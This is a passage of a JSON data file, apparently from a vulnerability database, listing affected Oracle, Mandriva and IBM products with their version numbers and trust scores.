            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2.2"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "communications service broker engineered system edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "communications service broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "communications service broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.1"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.4.1"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.9.1"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.7.3"
          },
          {
            "_id": null,
            "model": "communications online mediation controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "communications converged application server service controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.2.1.00.10"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.2.0.00.27"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "application express 1.1-ea",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1x8664"
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "websphere message broker for z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere message broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere message broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "websphere extended deployment compute grid",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.0"
          },
          {
            "_id": null,
            "model": "websphere extended deployment compute",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "websphere dashboard framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.0"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.3"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.2"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.1"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.1"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.13"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.12"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.11"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1100"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1000"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.1000"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4100"
          },
          {
            "_id": null,
            "model": "tivoli remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.2"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "tivoli composite application manager for application diagnostics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "tivoli asset discovery for distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "tivoli asset discovery for distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.21"
          },
          {
            "_id": null,
            "model": "support assistant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.40"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.3.20"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.3.2"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.2.1"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.2.0"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.1.1"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.1.0"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.0.4"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.3.2.3"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.3.0.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.7"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.6"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.5"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.2"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.0.6"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.0.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.01"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.41"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.1"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "sametime proxy server and web client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.1"
          },
          {
            "_id": null,
            "model": "sametime proxy server and web client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.1"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2.1"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.02"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.5"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.4"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.01"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer ifix1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.04"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.02"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.3"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.1"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "operational decision manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "omnifind enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "lotus widget factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "lotus mashups",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.1"
          },
          {
            "_id": null,
            "model": "lotus mashups",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.2"
          },
          {
            "_id": null,
            "model": "license metric tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "license metric tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "interact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "interact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "integration bus for z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.0"
          },
          {
            "_id": null,
            "model": "integration bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.0"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.7"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
